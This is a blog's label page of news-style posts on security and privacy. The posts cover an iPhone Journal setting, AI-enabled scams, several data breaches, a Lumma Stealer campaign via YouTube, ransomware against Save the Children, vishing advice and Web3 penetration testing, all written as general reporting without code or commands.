Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label User Safety. Show all posts
User Safety
Data Surveillance Data tracking Mobile Security User Privacy User Safety

An Unusual Tracking Feature Identified on Millions of iPhone Users

 

Millions of iPhone users across the globe discovered an interesting new setting that was automatically switched on in their iPhones. The latest software version included a new setting called "Discoverable by Others''. It can be located under 'Journalling Suggestions' in iPhone's privacy and security settings. Journalling Suggestions was included in the new Journal app, which was launched with iOS 17.2 in December 2023. 

When enabled, the feature accesses past data stored on the user's iPhone. Music, images, workouts, who they've called or texted, and significant locations are all included in the data. It is used to suggest what times to write about in the Journal app.

The feature is enabled by default and stays so even after a user deletes the Journal app. According to Joanna Stern, a senior personal technology correspondent for The Wall Street Journal, Apple has confirmed that customers' phones can use Bluetooth to locate nearby devices associated with their contact list. However, the phone does not save any information about the detected contacts. This feature offers context to enhance Journalling suggestions.

The firm has also denied disclosing users' identities and locations to anyone. To clarify their point, Apple provided an example of holding a dinner party at your home with pals listed in your contacts. According to the tech behemoth, the system may prioritise the event in Journalling Suggestions. This is because it recognises that the number of guests made it more than just another night at home with your family.

As per Apple's support page, if you disable the 'Discoverable by Others' option to avoid yourself from being counted among your contacts, the 'Prefer Suggestions with Others' feature will also be turned off. This implies that the Journalling Suggestions feature will be unable to determine the number of devices and contacts in your vicinity.
Read more »
User Safety
AI Scams Canada Cyber Fraud Data Privacy User Safety

Authorities Warn of AI Being Employed by Scammers to Target Canadians

 

As the usage of artificial intelligence (AI) grows, fraudsters employ it more frequently in their methods, and Canadians are taking note. According to the Royal Bank of Canada’s (RBC's) annual Fraud Prevention Month Poll, 75% of respondents are more concerned with fraud than ever before. Nine out of 10 Canadians feel that the use of AI will boost scam attempts over the next year (88%), thereby making everyone more exposed to fraud (89%).

As per the survey, 81 percent of Canadians think that AI will make phone fraud efforts more difficult to identify, and 81 percent are worried about scams that use voice cloning and impersonation techniques. 

"With the recent rise in voice cloning and deepfakes, fraudsters are able to employ a new level of sophistication to phone and online scams," stated Kevin Purkiss, vice president, Fraud Management, RBC. "The good news is that awareness of these types of scams is high, but we also need to take action to safeguard ourselves from fraudsters.”

The study also discovered that phishing (generic scams via email or text), spear phishing (emails or texts that appear authentic), and vishing (specific phone or voicemail scams) were among the top three types of fraud. More than half also report an increase in deepfake frauds (56%), while over half (47%) claim voice cloning scams are on the rise. 

Prevention tips

Set up notifications for your accounts, utilise multi-factor authentication whenever possible, and make the RBC Mobile App your primary banking tool. Keep an eye out for impersonation scams, in which fraudsters appear to be credible sources such as the government, bank employees, police enforcement, or even a family member. 

Some experts also recommend sharing a personal password with loved ones to ensure that you're conversing with the right individual. 

To avoid robo-callers from collecting your identity or voice, limit what you disclose on social media and make your voicemail generic and short. Ignore or delete unwanted emails and texts that request personal information or contain dubious links or money schemes.
Read more »
User Safety
Data Breach Data Theft Footwear Firm User Privacy User Safety

Vans Warns Consumers of Fraudsters Following ALPHV Data Breach

 

Vans customers have been alerted to the possibility of fraud or identity theft as a result of an ALPHV data breach at the parent firm. 

Vans claims that in December 2023, VF Group discovered "unauthorised activities" on a section of its IT systems. It also claimed that no passwords or detailed financial data were stolen.

However, it also stated that "it cannot be excluded" and that attackers may try to make use of the customer data they had taken hold of. The North Face, Dickies, Timberland, and other brands are owned by VF Group.

In an email to its customers, Vans stated that the data breach was discovered by VF Group on December 13 and was "apparently carried out by external threat actors."

The firm says it "immediately took steps" to address the threat, which included shutting down affected IT systems and hiring cybersecurity experts. By 15 December, it says, the hackers were ejected. 

"Our investigation revealed that the incident has affected some personal information of our customers that we normally store and process in order to manage online purchases, such as email address, full name, phone number, billing address, and shipping address," the email reads. 

However, it stated that the company did not "collect or retain" payment or financial data, such as bank account or credit card information, therefore there was "no chance that any detailed financial information was exposed to the threat actors." 

It said that no customers had been affected as of yet, but warned that the issue "may result in attempts at identity theft, phishing, and possibly fraud in general." 

It has warned users to be wary of unfamiliar emails, texts, and phone calls seeking personal information. Vans says it has informed the relevant law enforcement agencies and will evaluate its cybersecurity protocols.
Read more »
User Safety
Cracked Software Infostealer Malicious Apps malware User Safety

Beware of Malicious YouTube Channels Propagating Lumma Stealer

 

Attackers have been propagating a Lumma Stealer variant via YouTube channels that post videos about cracking into popular applications. They prevent detection by Web filters by spreading the malware over open source platforms like MediaFire and GitHub rather than proprietary malicious servers. 

The effort, according to FortiGuard researchers, is reminiscent of an attack that was uncovered in March of last year and employed artificial intelligence (AI) to disseminate step-by-step installation manuals for programmes like Photoshop, Autodesk 3ds Max, AutoCAD, and others without a licence. 

"These YouTube videos typically feature content related to cracked applications, presenting users with similar installation guides and incorporating malicious URLs often shortened using services like TinyURL and Cuttly," Cara Lin, Fortinet senior analyst, wrote in a blog post. 

Modus operandi 

The attack begins with a hacker infiltrating a YouTube account and publishing videos pretending to offer cracked software tips, along with video descriptions carrying malicious URLs. The descriptions also lure users to download a.ZIP file containing malicious content. 

The videos identified by Fortinet were uploaded earlier this year; however, the files on the file-sharing site are regularly updated, and the number of downloads continues to rise, suggesting that the campaign is reaching victims. "This indicates that the ZIP file is always new and that this method effectively spreads malware," Lin stated in a blog post. 

The .ZIP file contains an.LNK file that instructs PowerShell to download a.NET execution file from John1323456's GitHub project "New". The other two repositories, "LNK" and "LNK-Ex," both contain .NET loaders and use Lumma as the final payload.

"The crafted installation .ZIP file serves as an effective bait to deliver the payload, exploiting the user's intention to install the application and prompting them to click the installation file without hesitation," Lin wrote.

The .NET loader is disguised with SmartAssembly, a valid obfuscation technique. The loader then acquires the system's environment value and, after the number of data is correct, loads the PowerShell script. Otherwise, the procedure will depart the programme.

YouTube malware evasion and caution

The malware is designed to prevent detection. The ProcessStartInfo object starts the PowerShell process, which eventually calls a DLL file for the following stage of the attack, which analyses the environment using various methods to avoid detection. The technique entails looking for debuggers, security appliances or sandboxes, virtual machines, and other services or files that could impede a malicious process. 

"After completing all environment checks, the program decrypts the resource data and invokes the 'SuspendThread; function," Lin added. "This function is employed to transition the thread into a 'suspended' state, a crucial step in the process of payload injection.” 

Once launched, Lumma communicates with the command-and-control server (C2) and establishes a connection to transfer compressed stolen data back to the attackers. Lin observed that the variation employed in the campaign is version 4.0, but its exfiltration has been upgraded to use HTTPS to better elude detection. 

On the other hand, infection is trackable. In the publication, Fortinet provided users with a list of indications of compromise (IoCs) and cautionary advice regarding "unclear application sources." According to Fortinet, users should make sure that any applications they download from YouTube or any other platform are from reliable and safe sources.
Read more »
User Safety
Data Breach Data Leak Data Privacy Private Data User Safety

1.5 Billion Real Estate Records Leaked, Including Elon Musk and Kylie Jenner

 

Jeremiah Fowler, a cybersecurity researcher, uncovered and notified VPNMentor about an exposed database related to the New York-based online business Real Estate Wealth Network. The compromised database had 1.5 billion records, including real estate ownership data for millions of people. 

The database, which had a total size of 1.16 TB (1,523,776,691 records), had organised folders containing information on property owners, sellers, investors, and internal user tracking data. It included daily logging records from 4/22/23 to 10/23/23 that included internal user search data. 

Cameron Dunlap founded Real Estate Wealth Network in 1993 to provide education and resources for real estate investors. The platform costs a one-time, non-refundable fee of $1,450 for access to a vast collection of data, which includes online courses, training materials, a community, and mentorship/coaching from experienced experts. 

Upon further investigation, Fowler discovered that the exposed database contained the purported property ownership data of celebrities including Kylie Jenner, Blake Shelton, Britney Spears, Floyd Mayweather, Dave Chappelle, Elon Musk & Associates LLC, Dolly Parton, Donald J. Trump, Mark Wahlberg, and Nancy Pelosi. 

The online disclosure of celebrities' addresses could pose a number of threats, including concerns for their safety, invasion of privacy, stalking, and harassment by fans or malicious people. 

"The data was organised in various folders according to property history, motivated sellers, bankruptcy, divorce, tax liens, foreclosure, home owner association (HOA) liens, inheritance, court judgements, obituary (death), vacant properties, and more," VPNMentor’s blog post read. 

Everyone, famous or not, is at risk because real estate tax data, which includes information on property ownership, assessed property values, tax assessment history, and property tax payment history, can be used by criminals to gather personal information on property owners. 

Threat actors can utilise the data to target individuals with social engineering or phishing attacks, with the goal of obtaining financial or other personal information. The disclosure of data revealing whether a person bought their home with cash, without a mortgage loan, or has fully paid off their mortgage may increase the risk of financial fraud.

Property and mortgage fraud remain major issues, with the FBI reporting 11,578 incidents resulting in $350 million in losses in a single year, a 20% rise from 2017. Typically, property fraud entails taking a homeowner's identity and fabricating ownership documentation. 

Although the disclosed database has been locked from public access, a Real Estate Wealth Network representative confirmed ownership. The duration of the exposure and the possibility of unauthorised entry remains unknown. Only a forensic audit conducted internally could determine whether the records were accessed, extracted, or downloaded. 

This incident serves as a clear warning of the possibility of fraudulent activity involving easily accessible information. Property owners should be vigilant when disclosing personal information, especially in response to unsolicited requests for property information. Understanding the risks associated with semi-public data is critical for asset protection.
Read more »
User Safety
Cyber Security Data Currency Data Privacy Concerns User Privacy User Safety

Here's Why You Need To Protect Private Data Like It’s Currency

 

Data is the currency of the information age. We'd all be a lot better off if we treated data as though it were money because we'd be considerably more cautious about who we let access to it and with whom we share it. Brick-and-mortar banks physically safeguard our money with security measures like alarm systems, bank guards, and steel-walled vaults, so we feel comfortable entrusting them with our hard-earned money. 

But far too frequently, we trust third parties to hold our personal information without the data equivalent of alarms, guards, and vaults. The businesses that we trust with our private data appear to be concealing it under their digital mattresses and hoping that no one breaks in while they are away. 

No data currency is more private or valuable to us than our healthcare information, making it the most significant privacy risk in the United States today. The government incentivizes and penalises healthcare providers who do not use electronic medical records. The authorised electronic sharing of patient information between doctors enables for faster and more accurate patient treatment, ultimately saving lives and money. 

However, if the data cannot be safeguarded, the apparent benefits do not exceed the risks involved.Policymakers felt they could regulate privacy, forcing the American healthcare system to digitise private information before it could secure security. 

As a result, simply the possibility of a breach can deter people from getting the necessary medical attention. One in every eight patients, for example, compromises their health in order to safeguard their personal privacy by postponing early diagnosis and treatment and concealing other crucial information. The fear of losing control of their privacy prevents millions of people from seeking medical assistance, particularly those suffering from stigmatising diseases such as cancer, HIV/AIDS, other sexually transmitted diseases, and depression. 

Electronic medical records are supposed to benefit our health, but they are instead contributing to a loss of trust in the medical profession and ultimately a more unhealthy society. 

 Mitigation tips

To address these dangers, numerous approaches for protecting data from unauthorised access and manipulation have been developed. In this article, we will go through the top three data security methods. 

Encryption: It is a critical component of personal data security. It entails turning sensitive information into a coded format, rendering it unintelligible to anyone who lacks the necessary decryption key. Only the authorised user with the decryption key can decode and access the information. 

This technology is commonly used to encrypt sensitive data during internet transmission as well as data saved on devices such as laptops and mobile phones. Furthermore, encryption technologies like AES and RSA are employed to scramble the data, making it nearly hard for unauthorised people to access it. 

Backup and recovery: Data backup is an important part of data security since it ensures that data is saved in the case of data loss or corruption. Companies can quickly recover their data in case of a disaster by making copies of their data and storing them in a secure location. 

Many businesses choose cloud-based storage services like TitanFile because they provide a safe and dependable way to store and restore data. Experts also recommend adopting the 3-2-1 strategy for data backup. The 3-2-1 data backup method involves making three copies of data and storing them on two local devices (the original device and an external hard drive) and one off-site (cloud-based). 

Access control: It is a means of limiting authorised users' access to sensitive information. Passwords, multi-factor authentication, and role-based access control can help with this. These approaches ensure that sensitive data is only accessed by those who have the right authorisation, lowering the risk of data breaches and unauthorised access.
Read more »
User Safety
Car Maker Data Breach Data Leak Data Privacy Privacy Nightmare User Safety

Mozilla Report Calls Modern Cars a 'Privacy Nightmare'

 

Modern automotive technology enables some very special and convenient features. They're essentially four-wheeled smartphone extensions. As fantastic as it is to start a vehicle with a phone app or to have it self-park, there is a downside.

The Mozilla Foundation claimed in its latest report that cars are "the official worst category of products for privacy" it has ever analysed. 

The global nonprofit discovered that 84% of the reviewed automakers shared user data with third parties, giving users little (if any) control over their personal information.

None of the 25 automakers examined for the report satisfied the nonprofit organisation's minimal privacy standards, including Ford, Toyota, Volkswagen, BMW, and Tesla, which was also identified to be accumulating more personal information from customers than necessary. 

Data collected spans from personal information, such as medical information, to information about how drivers use the vehicle itself, such as how fast they drive, where they go, and even what music they are listening to. 

Both Nissan and Kia are known to permit the gathering of data about a user's sexual life. In comparison, Mozilla claims that 37% of mental health applications (which are also known for having bad data privacy practices) had superior practices for collecting and using private data.

According to the report, 84 percent of the evaluated car brands share users' personal information with service providers, data brokers, and perhaps dubious companies, with 76 percent claiming the right to sell such information. 56 percent of users are willing to provide information upon request to the government and/or law enforcement. 

With flags in every privacy category, Tesla received the lowest overall brand score in the survey and did so just twice. Following a number of collisions and fatalities, Tesla's AI-powered autopilot was criticised as "untrustworthy."

In addition to the research, Mozilla published a breakdown of how automakers acquire and share user data. This can include basic information such as the user's name, address, phone number, and email address, as well as more sensitive information such as images, calendar entries, and even specifics like the driver's race, genetic makeup, and immigration status. 

According to Mozilla, it was unable to establish if any of the automakers could meet the group's baseline security requirements for data encryption and theft protection. Indeed, it claims that, when compared to automobiles, dating apps and even sex toys frequently offer more comprehensive security information about their products. 

“While we worried that our doorbells and watches that connect to the internet might be spying on us, car brands quietly entered the data business by turning their vehicles into powerful data-gobbling machines,” stated Mozilla in the report. 

Mozilla claims to have spent more than 600 hours—three times as long per product as it typically does—researching the privacy policies of car manufacturers. The organisation claimed that because of how critical the report was, the recommendations it generally gives to assist clients protect their personal data feel like "tiny drops in a massive bucket." 

Instead, the Mozilla Foundation has launched a petition asking automakers to halt the data collecting initiatives from which they are unfairly profiting, saying that "our hope is that increasing awareness will encourage others to hold car companies accountable for their terrible privacy practises."
Read more »
User Safety
France iPhone 12 Mobile Radiation Mobile Security User Safety

Apple Seeks to Defuse a French iPhone 12 Issue as EU Inquiry Intensifies

 

In order to resolve a dispute concerning radiation levels, Apple pledged on Friday to upgrade the software on iPhone 12s in France. However, concerns in other European nations suggested Apple might need to take similar steps abroad. 

France suspended sales of iPhone 12 phones this week after tests revealed violations of radiation exposure regulations.

Apple refuted the findings, claiming that the iPhone 12 was approved by numerous international organisations as meeting all worldwide requirements, but announced on Friday that it would release a software update to take into account the French testing procedures. 

Over the past two decades, numerous studies have been undertaken to evaluate the health concerns related to mobile phones. The World Health Organisation claims that there is no evidence linking them to any negative health impacts. However, the radiation warning in France, which was based on test results that were different from those of other nations, has raised worries across Europe.

The Belgian state secretary for digitalization stated that he had urged Apple to update the software on the iPhone 12 across the EU, despite the fact that, according to the regulator's own preliminary analysis, the device poses no risk to customers. 

Italy was preparing to ask Apple to upgrade the software on iPhone 12s there, according to a government source in Rome, while Germany claimed it was in contact with French authorities to find an EU-wide solution. The conclusion of the French probe will come first, a second Italian government source claimed, and only then would Italian officials make any requests of Apple or take any independent actions.

The Dutch Authority for Digital Infrastructure stated that it is in contact with Apple as well as German and French authorities and is also conducting its own inquiry, which is due in two weeks. The organisation reported that it had received calls from customers who were worried. 

The French authorities welcomed Apple's software update, saying it will be quickly evaluated and would allow sales of the relatively old iPhone 12 model, which was released in 2020, to resume.

"We will issue a software update for users in France to accommodate the protocol used by French regulators. We look forward to iPhone 12 continuing to be available in France," Apple stated. "This is related to a specific testing protocol used by French regulators and not a safety concern."
Read more »
User Safety
Charity Organisation Cyber Attacks Data Leak Ransomware Gang User Safety

BianLian Ransomware Gang Siphons 6.8TB of Data from Save The Children

 

One of the biggest and oldest charities in the world, Save the Children, has admitted it was a victim of a ransomware attack by the BianLian operation. The attack first came to light on Monday, September 11, when details concerning the assault were posted to the gang's leak site. 

The attack was originally tracked by VX Underground and Brett Callow of Emsisoft. VX Underground declared that the gang needed "to be punched in the face," which is a statement that is difficult to dispute. 

Save the Children was not specifically mentioned at first by BianLian, who instead claimed to have struck "the world's leading non-profit organisation, employing around 25,000 staff and operating in 116 countries" with $2.8 billion in revenue. 

The charity's own boilerplate matches some of this description, but BianLian's assessment of Save the Children's financial situation seems to be wildly off; the organisation's entire revenue in 2022 was £294m. 

It claimed to have stolen 6.8TB of data, including 800GB of the charity's financial data, along with data on its human resources department, as well as individual users' personal information, including their health and medical records and email texts.

The BianLian ransomware gang is largely unknown, and although its name refers to a type of Chinese opera from Sichuan Province, it is far more likely that the group is a Russian-speaking one. It was one of many crews that appeared during 2022, ascending around the same time as groups like Black Basta, Hive, and Alphv/BlackCat and establishing themselves as a successful criminal organisation. 

It joined the group of ransomware groups that, as of 2023, have shifted away from encrypting the data of their victims and instead prefer to just grab it and demand payment in exchange for a promise not to disclose it. 

The US Cybersecurity and Infrastructure Security Agency (CISA) claims that BianLian generally uses legitimate Remote Desktop Protocol (RDP) credentials to access its victims' systems and makes use of a number of open source tools and command-line scripting for credential harvesting. 

It uses a variety of techniques to steal their data, most commonly using File Transfer Protocol (FTP) and legal cloud storage and file transfer services like Rclone and Mega. It makes a show of printing its ransom note on printers on its networks to put pressure on its victims, and staff of victimised companies have reported receiving threatening phone calls from individuals posing as group members.
Read more »
vishing scams prevention
Cyber Fraud Fraud Scams User Data User Safety User Security Vishing vishing scams prevention

Vishing Scams: Here's How to Spot & Defend Against Them

 

Vishing (voice or VoIP phishing) is a sort of cyber attack that uses voice and telephony technologies to deceive targeted persons into disclosing sensitive data to unauthorized entities. 

The information could be personal, such as a Social Security number or details about a financial account, or it could be tied to a commercial environment. For example, fraudsters may use vishing to entice an employee to provide network access information.

In 2022, "38% of the reports submitted to the FTC by consumers ages 80+ indicated phone calls as the initial contact method," according to Ally Armeson, executive program director of Cybercrime Support Network. (Calls were the most popular mode of contact for this age group.)"

"Vishing, also known as voice phishing," Aremson continues, "is a growing threat in the world of cybercrime, particularly targeting the elderly."  

The scam takes advantage of the fact that the elderly are more likely to trust phone contacts by impersonating false charities, appearing as relatives, or pretending to be trustworthy locations like government agencies. 

As a result, sharing credit card information, social security numbers, login credentials, or other valuable data is likely.

How to defend yourself?

  • Take the effort to confirm the caller's identification by visiting the organization's website.
  • Never give up personal or financial information over the phone. Legitimate organizations will never ask for credit card information, social security numbers, or passwords.
  • Do not be hesitant to call into question the legitimacy of unknown numbers. Legitimate organizations will never ask for credit card information, social security numbers, or passwords.
  • Don't be hesitant to question the legitimacy of unknown phone numbers, and be wary of providing important information over the phone without first verifying the caller's identity.
  • Since caller ID can be easily spoofed, don't rely on it alone to decide whether a call is real. I recommend remaining attentive and exercising caution while disclosing sensitive information.
  • Any unknown phone caller should be routed to voicemail so you can screen the call. Remember to notify the FTC of any unusual calls or suspected fraudulent activities at ReportFraud.ftc.gov.
  • In general, do not give any financial or Social Security information over the phone, by text, or via email.  
By following these tips, you can help protect yourself from vishing scams
Read more »
User Safety
Data Breach Data Leak Data Theft Metaverse Private Data User Safety

Here's How Hackers Sell and Trade Your Data in the Metaverse

 

Your data might be lost in the metaverse, a place where reality takes on new forms and lovely virtual landscapes arise. 

Imagine yourself in a bustling digital marketplace, surrounded by avatars dressed in the latest digital attire. A secret underground network is concealed in the metaverse's shadowy side while you're taking in all the sights and sounds. Here, data sellers and hackers can be found together, chatting about the most recent hacks and online theft. 

Darkverse: A flip side of metaverse

If you're not sure what the darkverse is, think of the wild west of the digital world; it's a place where wicked acts flourish in the absence of law. Cybercriminals, hackers, and other malicious actors dwell in this shadowy domain and operate outside the bounds of morality and the law, significantly jeopardising the stability and security of the metaverse. 

Identity theft, fraud, and data breaches are commonplace in the darkverse, preying on unsuspecting users who take a chance in this dangerous environment. Automated bots roam freely, spamming and deceiving innocent users, while cutting-edge AI and deepfake technology generate fake data, obscuring a matter of truth and reliability. 

What type of data is sold on metaverse? 

Cybercriminals have adapted to this environment by selling all forms of stolen data to the highest bidders, and metaverse data marketplaces are similarly active. Personal data, which can include your name, address, phone number, and other information, comes first on the list. 

Identity theft is common in the metaverse, as malicious actors might adopt your online persona for profit or other reasons. So, before you go in, it's useful to learn about the most common metaverse crimes. 

Another noticeable commodity is financial data. Credit card information, bank account information, and digital wallets are highly sought after because cybercriminals can use this information to conduct unauthorised transactions, depleting victims' accounts in the blink of an eye. 

Access credentials are another common item on the illicit market. If hackers obtain your usernames and passwords, they will gain access to your digital life and cause havoc on your social media, emails, and more vital accounts. In virtual worlds and blockchain-based games, rare skins, strong weaponry, and one-of-a-kind artefacts are stolen and sold for real-world cash. 

Finally, private communications containing sensitive information are a bonanza for hackers. They'll try to pry into your personal communications, gathering compromising information to use against you or sell to the highest bidder. 

Mitigation tips 

Since the metaverse has yet to make an appearance, little can be said about how to address these challenges. So far, people's hopes are aligned with Zuckerberg himself. He might develop a robust cybersecurity structure for the metaverse and implement techniques to assure data privacy and security.

However, given the privacy concerns that have emerged as a result of the idea, there are a few ways that users, whether companies or individual netizens, can secure data privacy and security within the metaverse. 

Organisations can govern the use of such information because accumulating personal information and surveillance is not something that anyone other than Facebook can control. Any organisation that establishes virtual offices in the metaverse should have stringent data privacy and security rules in place. Users should be able to control how much personal information they are willing to reveal. 

Aside from that, organisations using AR/VR devices or platforms should rigorously monitor the risks of hack assaults, data breaches, and other hostile attacks. Similarly, these organisations will need to plan ahead of time for hostile AI attacks and enable defence against them. 

Individual users who join the metaverse should be cautious about the amount and type of information they reveal. Furthermore, it is critical that they implement internet security measures meant to safeguard customers from privacy intrusions and data breaches.
Read more »
User Security
attacks Crypto Crypto Apps cryptocurrency Data Breach LastPass Security Breach User Data User Privacy User Safety User Security

LastPass Security Breach Linked to Series of Crypto Heists, Say Experts

 

Security experts allege that some of the LastPass password vaults, which were stolen in a security breach towards the end of 2022, have now been successfully breached, leading to a series of substantial cryptocurrency thefts. 

According to cybersecurity blogger Brian Krebs, a group of researchers has uncovered compelling evidence linking over 150 victims of crypto theft to the LastPass service. The combined value of the stolen cryptocurrency is estimated to be over $35 million, with a frequency of two to five high-value heists occurring each month since December 2022.

Taylor Monahan, the lead product manager at MetaMask, a cryptocurrency wallet company, and a prominent figure in the investigation, noted that the common denominator among the victims was their prior use of LastPass to safeguard their "seed phrase" – a confidential digital key necessary to access cryptocurrency investments. 

These keys are typically stored on secure platforms like password managers to thwart unauthorized access to crypto wallets. Furthermore, the pilfered funds were traced to the same blockchain addresses, further solidifying the connection between the victims.

LastPass, a password management service, experienced two known security breaches in August and November of the previous year. 

During the latter incident, hackers utilized information acquired from the first breach to gain access to shared cloud storage containing customer encryption keys for vault backups. We have contacted LastPass to verify if any of the stolen password vaults have indeed been breached and will provide an update if we receive a response.

LastPass CEO Karim Toubba informed The Verge in a statement that the security breach in November is still under active investigation by law enforcement and is also the subject of pending litigation. The company did not confirm whether the 2022 LastPass breaches are related to the reported crypto thefts.

Researcher Nick Bax, who holds the position of Director of Analytics at crypto wallet recovery company Unciphered, also examined the theft data and concurred with Monahan’s conclusions in an interview with KrebsOnSecurity:

“I’m confident enough that this is a real problem that I’ve been urging my friends and family who use LastPass to change all of their passwords and migrate any crypto that may have been exposed, despite knowing full well how tedious that is.”
Read more »
User Safety
Airports Analysis Cancellations Cyber Security Disruption EasyJet Flights Nats User Data User Safety

Flight Data Issues Trigger UK Air Traffic Control Failure

 

A significant air traffic control malfunction resulted in extensive flight disruptions, leaving numerous passengers stranded both domestically and internationally. The root cause of this disruption was attributed to issues with the reception of flight data.

Martin Rolfe, the CEO of National Air Traffic Services (Nats), disclosed that the primary and backup systems experienced a suspension of automatic processing during the incident. In his statement, Mr. Rolfe clarified that there is no evidence to suggest that the malfunction was the result of a cyber-attack.

Furthermore, Mr. Rolfe sought to provide assurance by emphasizing that all Nats systems have been operating normally since Monday afternoon, effectively supporting the seamless functioning of airlines and airports.

He said: ‘Very occasionally technical issues occur that are complex and take longer to resolve.  In the event of such an issue our systems are designed to isolate the problem and prioritise continued safe air traffic control. This is what happened yesterday. At no point was UK airspace closed but the number of flights was significantly reduced. Initial investigations into the problem show it relates to some of the flight data we received.'

‘Our systems, both primary and the back-ups, responded by suspending automatic processing to ensure that no incorrect safety-related information could be presented to an air traffic controller or impact the rest of the air traffic system.'

The trouble began on Monday when over 25% of flights at UK airports faced cancellations.

Nats encountered what they labeled as a 'technical glitch,' rendering them unable to automatically process flight plans. Consequently, flights to and from UK airports were subject to restrictions while manual checks were conducted on these plans.

Although Nats reported the issue resolved at 3.15 pm on Monday, the disruption persisted into Tuesday due to aircraft and crews being displaced.

An analysis of flight data websites conducted by the PA news agency revealed that on Tuesday, a minimum of 281 flights, encompassing both departures and arrivals, were canceled at the UK's six busiest airports. Specifically, there were 75 cancellations at Gatwick, 74 at Heathrow, 63 at Manchester, 28 at Stansted, 23 at Luton, and 18 at Edinburgh.

In response to the air traffic control malfunction, EasyJet announced its plans to operate five repatriation flights to Gatwick and deploy larger aircraft on crucial routes.

It said: ‘During this traditionally very busy week for travel, options for returning to the UK are more limited on some routes and so easyJet will be operating five repatriation flights to London Gatwick over the coming days from Palma and Faro on August 30, and Tenerife and Enfidha on August 31 and from Rhodes on September 1.

‘We are also operating larger aircraft on key routes including Faro, Ibiza, Dalaman and Tenerife to provide some additional 700 seats this week.’

Read more »
User Safety
Cyber Crime Illicit Activity Infostealer Travel Company User Privacy User Safety

New Study Reveals Airbnb as a Haven for Cybercrime

 

Cybercriminals have been increasingly using the Airbnb network for illicit activities. A new research by cybersecurity experts at SlashNext uncovered the methods employed by these malicious actors to hack user accounts and benefit from stolen data. 

Due to its global ubiquity and reputation to offer travellers with affordable lodging, Airbnb—a household name in the travel industry—has become a prime target. SlashNext clarified, however, that because of this accessibility, cybercriminals have been able to take advantage of the system and exploit it for their own purposes.

Stealers are at the heart of these cyber-attacks, infiltrating devices and accumulating sensitive information such as login credentials. This stolen data is subsequently sent to the attackers, allowing them to gain unauthorised access to user accounts. The research sheds light on the numerous access points employed by cybercriminals, ranging from software flaws to social engineering techniques.

The study also uncovered an underground marketplace where cybercriminals buy and sell bulk access to hacked devices (also known as bots, installs, or infections). This enables thieves to rapidly deploy malicious software on a large scale, broadening the scope of their attacks.

Session cookies play a crucial role among the strategies used by cybercriminals to obtain unauthorised access to user accounts. These tiny files, which frequently provide momentary website access, record browsing habits and user preferences. 

Cybercriminals acquire stolen Airbnb account cookies from darknet marketplaces, enabling them to get access without having to use legitimate usernames and passwords. Even though they are brief in length, attackers quickly take advantage of these stolen access opportunities. 

The investigation also shows how the stolen data was sold. Online forums and digital marketplaces are used by cybercriminals to sell stolen cookies and compromised account information to interested parties. Each compromised Airbnb account apparently has had its value reduced to as little as one dollar due to the scope of the account theft. 

This research emphasises how crucial it is to comprehend the constantly evolving tactics used by cybercriminals as well as the weaknesses they prey upon. It serves as a reminder that even well-known services like Airbnb might include unreported dangers, mandating more user knowledge and proactive security measures.
Read more »
Web3
cryptocurrency Data Data Safety data security Technology User Data User Safety Web3

Why Web3 Penetration Testing is Vital for Protecting Decentralized Systems

 

Web3, the transformative evolution of the internet, has introduced a new era of decentralization, opening up exciting opportunities for applications, transactions, and interactions. With a strong focus on user control, data integrity, and transparency, Web3 technologies are reshaping the digital realm.

In the midst of this groundbreaking shift, ensuring the security of decentralized applications (dApps), smart contracts, and blockchain networks has become a critical concern. The task of maintaining transaction integrity, smart contract reliability, and user data protection has become more intricate and crucial than ever.

In a landscape where traditional cybersecurity measures might not suffice due to the unique features of decentralized systems, Web3 Penetration Testing emerges as a vital defense mechanism.

As reliance on decentralized technologies continues to surge, the necessity for robust security practices is evident. This article delves into the realm of Web3 Penetration Testing, shedding light on its significance, methodologies, and its role in reinforcing the security of Web3 applications. Let’s explore how this specialized testing is shaping the security landscape of Web3, ensuring that the vision of a decentralized future remains both revolutionary and secure.

The Significance of Web3 Penetration Testing

In the face of the paradigm shift brought about by Web3 technologies, the importance of robust cybersecurity has never been more apparent. In this context, Web3 Penetration Testing emerges as a crucial defense against the evolving threats within decentralized applications (dApps), smart contracts, and blockchain networks.

Differing from traditional penetration testing that might overlook the intricacies of decentralization, Web3 Penetration Testing is tailor-made to tackle the unique challenges and vulnerabilities inherent in this novel ecosystem.

  • Securing the Decentralized Horizons
Security takes center stage in the world of Web3 technologies. Web3 Penetration Testing plays a pivotal role in securing decentralized applications (dApps), smart contracts, and blockchain networks.

This specialized assessment addresses the unique security hurdles posed by decentralization. Unlike conventional penetration testing, it navigates the complexities of blockchain networks and dApps. By simulating real-world attacks, it exposes vulnerabilities that could potentially result in unauthorized access, data breaches, and financial losses.

Failing to address these security concerns can lead to substantial risks, including harm to reputation and financial setbacks. As the promise of decentralization gains prominence, Web3 Penetration Testing stands as a vital stride toward bolstering the foundations of this transformative technology.

  • Traversing the Security Landscape
Web3 Penetration Testing is a specialized and indispensable security evaluation tailored for the nuances of Web3 technologies. Its primary goal is to meticulously assess the security readiness of decentralized applications (dApps), smart contracts, and the intricate blockchain networks that constitute the Web3 ecosystem.

At its core, Web3 Penetration Testing simulates real-world attacks to uncover vulnerabilities that could potentially be exploited by malicious actors. Unlike traditional penetration testing, which might not address the nuanced challenges of decentralization, Web3 Penetration Testing is uniquely designed to tackle the specific security concerns that arise in the context of blockchain networks and decentralized systems.

Through a systematic process of probing and analysis, this form of testing identifies potential entry points, vulnerabilities, and weaknesses. It provides actionable insights that empower organizations to enhance the resilience of their Web3 solutions and effectively guard against a wide array of security risks.

  • Addressing Decentralization's Uniqueness
Web3 Penetration Testing goes beyond conventional testing methods by honing in on the distinctive intricacies presented by decentralized systems. Unlike traditional penetration testing, which might disregard the complexities of blockchain networks and decentralized applications (dApps), Web3 Penetration Testing is purpose-built to navigate this evolving terrain.

The decentralized nature of Web3 introduces novel challenges—smart contract vulnerabilities, blockchain consensus mechanisms, and intricate interactions between components—all of which demand a specialized approach. Web3 Penetration Testing rises to this challenge, scrutinizing the security layers specific to decentralized systems.

In doing so, it uncovers vulnerabilities that might otherwise remain concealed. By simulating attacks and considering the nuances of blockchain technology, this form of testing ensures a comprehensive evaluation. As a result, organizations gain a deep understanding of their security gaps and receive tailored recommendations to fortify their Web3 solutions.

  • Navigating Complexities for Strong Security
Decentralized applications (dApps) and smart contracts are at the forefront of the Web3 revolution. However, they also introduce a unique set of security challenges. Smart contracts, while immutable, are not impervious to coding flaws. Blockchain networks, while secure by design, can still be susceptible to vulnerabilities.

